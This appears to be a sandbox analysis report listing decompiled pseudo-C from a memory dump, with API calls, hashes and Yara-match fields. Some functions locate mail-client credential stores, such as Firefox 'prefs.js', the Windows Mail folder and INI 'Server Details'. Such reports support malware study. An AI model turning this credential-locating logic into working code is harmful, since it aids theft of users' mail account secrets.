                                                                                              • String ID: sqlite3.dll
                                                                                              • API String ID: 1581230619-1155512374
                                                                                              • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                              • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                                                              • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                              • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				void _v515;
                                                                                              				char _v516;
                                                                                              				void* __esi;
                                                                                              				void* _t15;
                                                                                              				intOrPtr* _t24;
                                                                                              				char* _t26;
                                                                                              
                                                                                              				_t24 = __ecx;
                                                                                              				_v260 = 0;
                                                                                              				memset( &_v259, 0, 0xfe);
                                                                                              				_v516 = 0;
                                                                                              				memset( &_v515, 0, 0xfe);
                                                                                              				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
                                                                                              				_t26 =  &_v260;
                                                                                              				E00409018(_t26, _t15);
                                                                                              				sprintf( &_v516, "</%s>\r\n", _t26);
                                                                                              				return E00405EFD(_a4,  &_v516);
                                                                                              			}












                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00409917
                                                                                              • memset.MSVCRT ref: 0040992D
                                                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                              • sprintf.MSVCRT ref: 00409957
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                              • String ID: </%s>
                                                                                              • API String ID: 3202206310-259020660
                                                                                              • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                              • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                                              • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                              • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406734(char* __edi, char* _a4) {
                                                                                              				char* _t12;
                                                                                              				int _t13;
                                                                                              
                                                                                              				_t12 = __edi;
                                                                                              				_t13 = strlen(__edi);
                                                                                              				if(strlen(_a4) + _t13 < 0x104) {
                                                                                              					_t2 =  &_a4; // 0x410d64
                                                                                              					strcat(_t13 + __edi,  *_t2);
                                                                                              				}
                                                                                              				return _t12;
                                                                                              			}






                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 00406736
                                                                                              • strlen.MSVCRT ref: 00406741
                                                                                              • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$strcat
                                                                                              • String ID: dA
                                                                                              • API String ID: 2335785903-82490789
                                                                                              • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                              • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                                                              • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                              • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                                              				void* __ebx;
                                                                                              				intOrPtr _t22;
                                                                                              				void* _t23;
                                                                                              				void* _t25;
                                                                                              				void* _t27;
                                                                                              				void* _t29;
                                                                                              				void* _t32;
                                                                                              				void* _t36;
                                                                                              				signed short _t42;
                                                                                              				char* _t47;
                                                                                              				void* _t48;
                                                                                              				intOrPtr _t49;
                                                                                              				intOrPtr _t50;
                                                                                              				void* _t57;
                                                                                              
                                                                                              				_t22 = _a4;
                                                                                              				_t57 = _t22 - 6;
                                                                                              				_t47 = _a8;
                                                                                              				_t48 = __ecx;
                                                                                              				 *_t47 = 0;
                                                                                              				if(_t57 > 0) {
                                                                                              					_t23 = _t22 - 7;
                                                                                              					if(_t23 == 0) {
                                                                                              						return __ecx + 0x214;
                                                                                              					}
                                                                                              					_t25 = _t23 - 1;
                                                                                              					if(_t25 == 0) {
                                                                                              						return __ecx + 0x294;
                                                                                              					}
                                                                                              					_t27 = _t25 - 1;
                                                                                              					if(_t27 == 0) {
                                                                                              						return __ecx + 0x314;
                                                                                              					}
                                                                                              					_t29 = _t27 - 1;
                                                                                              					if(_t29 == 0) {
                                                                                              						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
                                                                                              						if(_t49 < 1 || _t49 > 7) {
                                                                                              							if(_t49 < 8 || _t49 > 0xe) {
                                                                                              								if(_t49 < 0xf || _t49 > 0x19) {
                                                                                              									if(_t49 < 0x1a || _t49 > 0x2d) {
                                                                                              										if(_t49 < 0x2e) {
                                                                                              											L16:
                                                                                              											return _t47;
                                                                                              										}
                                                                                              										_t42 = 0x519;
                                                                                              									} else {
                                                                                              										_t42 = 0x518;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_t42 = 0x517;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t42 = 0x516;
                                                                                              							}
                                                                                              							goto L20;
                                                                                              						} else {
                                                                                              							_t42 = 0x515;
                                                                                              							L20:
                                                                                              							return E004078FF(_t42);
                                                                                              						}
                                                                                              					}
                                                                                              					_t32 = _t29 - 1;
                                                                                              					if(_t32 == 0) {
                                                                                              						return __ecx + 0x190;
                                                                                              					}
                                                                                              					if(_t32 != 1) {
                                                                                              						goto L16;
                                                                                              					}
                                                                                              					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
                                                                                              					L14:
                                                                                              					if(_t50 != 0) {
                                                                                              						_push(0xa);
                                                                                              						_push(_t47);
                                                                                              						_push(_t50);
                                                                                              						L0041158E();
                                                                                              					}
                                                                                              					goto L16;
                                                                                              				}
                                                                                              				if(_t57 == 0) {
                                                                                              					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
                                                                                              					goto L20;
                                                                                              				}
                                                                                              				if(_t22 == 0xfffffff6) {
                                                                                              					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
                                                                                              					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
                                                                                              					goto L16;
                                                                                              				}
                                                                                              				if(_t22 == 0) {
                                                                                              					return __ecx + 0xc;
                                                                                              				}
                                                                                              				if(_t22 == 1) {
                                                                                              					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
                                                                                              					goto L20;
                                                                                              				}
                                                                                              				if(_t22 == 2) {
                                                                                              					return __ecx + 0x90;
                                                                                              				}
                                                                                              				if(_t22 == 3) {
                                                                                              					return __ecx + 0x110;
                                                                                              				}
                                                                                              				if(_t22 == 4) {
                                                                                              					_t50 =  *((intOrPtr*)(__ecx + 0x394));
                                                                                              					goto L14;
                                                                                              				}
                                                                                              				if(_t22 != 5) {
                                                                                              					goto L16;
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
                                                                                              					_push(0x10);
                                                                                              				} else {
                                                                                              					_push(0xf);
                                                                                              				}
                                                                                              				_pop(_t42);
                                                                                              				goto L20;
                                                                                              			}


















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _ultoasprintf
                                                                                              • String ID: %s %s %s
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				char _v328;
                                                                                              				char _v652;
                                                                                              				char _v928;
                                                                                              				char _v1296;
                                                                                              				signed int _v1300;
                                                                                              				void* __esi;
                                                                                              				char* _t26;
                                                                                              				intOrPtr* _t43;
                                                                                              
                                                                                              				_v1300 = _v1300 | 0xffffffff;
                                                                                              				_v1296 = 0;
                                                                                              				_v328 = 0;
                                                                                              				_v652 = 0;
                                                                                              				_t43 = __ecx;
                                                                                              				E00406E68( &_v1300, __eflags, "*.*", _a4);
                                                                                              				while(E00406EC3( &_v1300) != 0) {
                                                                                              					__eflags = E00406E2D( &_v1300);
                                                                                              					if(__eflags == 0) {
                                                                                              						__eflags = _a8 - 1;
                                                                                              						if(_a8 > 1) {
                                                                                              							_t26 =  &_v928;
                                                                                              							_push("prefs.js");
                                                                                              							_push(_t26);
                                                                                              							L004115B2();
                                                                                              							__eflags = _t26;
                                                                                              							if(_t26 == 0) {
                                                                                              								__eflags = E0040614B( &_v652);
                                                                                              								if(__eflags != 0) {
                                                                                              									E0040D1EC(_t43, __eflags,  &_v652);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_a8 = _a8 + 1;
                                                                                              						E0040D37A(_t43, __eflags,  &_v652, _a8);
                                                                                              					}
                                                                                              				}
                                                                                              				E00406F5B( &_v1300);
                                                                                              				return 1;
                                                                                              			}












                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$FileFindFirst
                                                                                              • String ID: *.*$prefs.js
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				char* _v52;
                                                                                              				intOrPtr _v56;
                                                                                              				signed int _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				intOrPtr _v76;
                                                                                              				struct tagOFNA _v80;
                                                                                              				intOrPtr _t23;
                                                                                              				intOrPtr* _t33;
                                                                                              				intOrPtr _t34;
                                                                                              				char* _t38;
                                                                                              
                                                                                              				_t38 = __edi;
                                                                                              				_t34 = __ecx;
                                                                                              				_t33 = __ebx;
                                                                                              				_t23 = 1;
                                                                                              				if(__ebx != 0) {
                                                                                              					_t23 =  *__ebx;
                                                                                              				}
                                                                                              				_v64 = _v64 & 0x00000000;
                                                                                              				_v44 = _v44 & 0x00000000;
                                                                                              				_v36 = _v36 & 0x00000000;
                                                                                              				_v56 = _t23;
                                                                                              				_v32 = _a8;
                                                                                              				_v20 = _a12;
                                                                                              				_v76 = _t34;
                                                                                              				_v80 = 0x4c;
                                                                                              				_v68 = _a4;
                                                                                              				_v52 = _t38;
                                                                                              				_v48 = 0x104;
                                                                                              				_v28 = 0x80806;
                                                                                              				if(GetSaveFileNameA( &_v80) == 0) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					if(_t33 != 0) {
                                                                                              						 *_t33 = _v56;
                                                                                              					}
                                                                                              					strcpy(_t38, _v52);
                                                                                              					return 1;
                                                                                              				}
                                                                                              			}




















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileNameSavestrcpy
                                                                                              • String ID: L
                                                                                              • API String ID: 1182090483-2909332022
                                                                                              • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                              • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                                                              • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                              • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040ADB3(void* __ebx, void* __eflags) {
                                                                                              				char _v265;
                                                                                              				char _v526;
                                                                                              				char _v787;
                                                                                              				void _v1048;
                                                                                              				void _v3648;
                                                                                              				intOrPtr _v3652;
                                                                                              				char _v3660;
                                                                                              				void* _t30;
                                                                                              
                                                                                              				_t30 = __ebx;
                                                                                              				_v3660 = 0x41300c;
                                                                                              				memset( &_v3648, 0, 0x10);
                                                                                              				_v1048 = 0;
                                                                                              				_v787 = 0;
                                                                                              				_v526 = 0;
                                                                                              				_v265 = 0;
                                                                                              				_v3652 = 0x6c;
                                                                                              				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
                                                                                              				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
                                                                                              					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
                                                                                              				}
                                                                                              				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
                                                                                              				return E0040143D( &_v3660);
                                                                                              			}












                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040ADD3
                                                                                              • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                                                • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FocusMessagePostmemset
                                                                                              • String ID: l
                                                                                              • API String ID: 3436799508-2517025534
                                                                                              • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                              • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                                                              • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                              • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00408441(void** __esi, struct HWND__* _a4) {
                                                                                              				long _v12;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				short _v32;
                                                                                              				void* _v40;
                                                                                              				long _t17;
                                                                                              				short* _t23;
                                                                                              				int _t24;
                                                                                              				void** _t25;
                                                                                              
                                                                                              				_t25 = __esi;
                                                                                              				_t24 = 0;
                                                                                              				if(_a4 != 0) {
                                                                                              					_t17 = memset( *__esi, 0, __esi[1] << 2);
                                                                                              					if(__esi[1] > 0) {
                                                                                              						do {
                                                                                              							_v28 = _v28 & 0x00000000;
                                                                                              							_v24 = _v24 & 0x00000000;
                                                                                              							_t23 =  *_t25 + _t24 * 4;
                                                                                              							_v40 = 0x22;
                                                                                              							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
                                                                                              							if(_t17 != 0) {
                                                                                              								 *_t23 = _v32;
                                                                                              								_t17 = _v12;
                                                                                              								 *(_t23 + 2) = _t17;
                                                                                              							}
                                                                                              							_t24 = _t24 + 1;
                                                                                              						} while (_t24 < _t25[1]);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t17;
                                                                                              			}













                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessageSendmemset
                                                                                              • String ID: "
                                                                                              • API String ID: 568519121-123907689
                                                                                              • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                              • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                                                              • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                              • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				char* _v52;
                                                                                              				intOrPtr _v56;
                                                                                              				intOrPtr _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				intOrPtr _v76;
                                                                                              				struct tagOFNA _v80;
                                                                                              
                                                                                              				_v76 = __eax;
                                                                                              				_v68 = _a4;
                                                                                              				_v64 = 0;
                                                                                              				_v44 = 0;
                                                                                              				_v36 = 0;
                                                                                              				_v32 = _a8;
                                                                                              				_v80 = 0x4c;
                                                                                              				_v56 = 1;
                                                                                              				_v52 = __esi;
                                                                                              				_v48 = 0x104;
                                                                                              				_v28 = 0x81804;
                                                                                              				_v20 = 0x413008;
                                                                                              				if(GetOpenFileNameA( &_v80) == 0) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					strcpy(__esi, _v52);
                                                                                              					return 1;
                                                                                              				}
                                                                                              			}
















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileNameOpenstrcpy
                                                                                              • String ID: L
                                                                                              • API String ID: 812585365-2909332022
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadMenuA.USER32 ref: 00407BC1
                                                                                              • sprintf.MSVCRT ref: 00407BE4
                                                                                                • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
                                                                                                • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                                                                • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
                                                                                                • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                                                                • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                                                                • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                                                                • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                              • String ID: menu_%d
                                                                                              • API String ID: 3671758413-2417748251
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406325(char* _a4) {
                                                                                              
                                                                                              				if( *0x417550 == 0) {
                                                                                              					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
                                                                                              				}
                                                                                              				strcpy(_a4, 0x417550);
                                                                                              				return  *0x417658;
                                                                                              			}




                                                                                              APIs
                                                                                              • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                              • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DirectoryWindowsstrcpy
                                                                                              • String ID: PuA
                                                                                              • API String ID: 531766897-3228437271
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00408348(char* __esi) {
                                                                                              				char* _t2;
                                                                                              				char* _t6;
                                                                                              
                                                                                              				_t6 = __esi;
                                                                                              				E00406160(__esi);
                                                                                              				_t2 = strrchr(__esi, 0x2e);
                                                                                              				if(_t2 != 0) {
                                                                                              					 *_t2 = 0;
                                                                                              				}
                                                                                              				return strcat(_t6, "_lng.ini");
                                                                                              			}






                                                                                              APIs
                                                                                                • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                                                              • strrchr.MSVCRT ref: 00408351
                                                                                              • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileModuleNamestrcatstrrchr
                                                                                              • String ID: _lng.ini
                                                                                              • API String ID: 3097366151-1948609170
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {
                                                                                              
                                                                                              				_t2 =  &_a12; // 0x403428
                                                                                              				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
                                                                                              			}




                                                                                              APIs
                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString
                                                                                              • String ID: (4@$Server Details
                                                                                              • API String ID: 1096422788-3984282551
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E004084CE(intOrPtr* __esi, void* __eflags) {
                                                                                              				intOrPtr* _t22;
                                                                                              				intOrPtr* _t31;
                                                                                              
                                                                                              				_t31 = __esi;
                                                                                              				 *__esi = 0x413320;
                                                                                              				_t22 = E00406549(0x1c8, __esi);
                                                                                              				_push(0x14);
                                                                                              				L004115D0();
                                                                                              				if(_t22 == 0) {
                                                                                              					_t22 = 0;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                                              					 *_t22 = 0;
                                                                                              					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                                              					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                                              					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                                              				}
                                                                                              				_push(0x14);
                                                                                              				 *((intOrPtr*)(_t31 + 4)) = _t22;
                                                                                              				L004115D0();
                                                                                              				if(_t22 == 0) {
                                                                                              					_t22 = 0;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                                              					 *_t22 = 0;
                                                                                              					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                                              					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                                              					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                                              				}
                                                                                              				_push(0x14);
                                                                                              				 *((intOrPtr*)(_t31 + 8)) = _t22;
                                                                                              				L004115D0();
                                                                                              				if(_t22 == 0) {
                                                                                              					_t22 = 0;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                                              					 *_t22 = 0;
                                                                                              					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                                              					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                                              					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                                              				}
                                                                                              				_push(0x14);
                                                                                              				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
                                                                                              				L004115D0();
                                                                                              				if(_t22 == 0) {
                                                                                              					_t22 = 0;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                                              					 *_t22 = 0;
                                                                                              					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                                              					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                                              					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
                                                                                              				return _t31;
                                                                                              			}






                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                              • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                                                              • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                              • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406A74(void* __eax, void* __ecx, char* _a4) {
                                                                                              				int _v8;
                                                                                              				void* __edi;
                                                                                              				int _t27;
                                                                                              				intOrPtr _t28;
                                                                                              				intOrPtr _t31;
                                                                                              				intOrPtr _t42;
                                                                                              				intOrPtr _t52;
                                                                                              				void** _t55;
                                                                                              				void** _t56;
                                                                                              				void* _t59;
                                                                                              
                                                                                              				_t59 = __eax;
                                                                                              				_t27 = strlen(_a4);
                                                                                              				_t42 =  *((intOrPtr*)(_t59 + 4));
                                                                                              				_t52 = _t42 + _t27 + 1;
                                                                                              				_v8 = _t27;
                                                                                              				_t28 =  *((intOrPtr*)(_t59 + 0x14));
                                                                                              				 *((intOrPtr*)(_t59 + 4)) = _t52;
                                                                                              				_t55 = _t59 + 0x10;
                                                                                              				if(_t52 != 0xffffffff) {
                                                                                              					E004060FA(_t59, _t52, _t55, 1, _t28);
                                                                                              				} else {
                                                                                              					free( *_t55);
                                                                                              				}
                                                                                              				_t53 =  *(_t59 + 0x1c);
                                                                                              				_t31 =  *((intOrPtr*)(_t59 + 0x18));
                                                                                              				_t56 = _t59 + 0xc;
                                                                                              				if( *(_t59 + 0x1c) != 0xffffffff) {
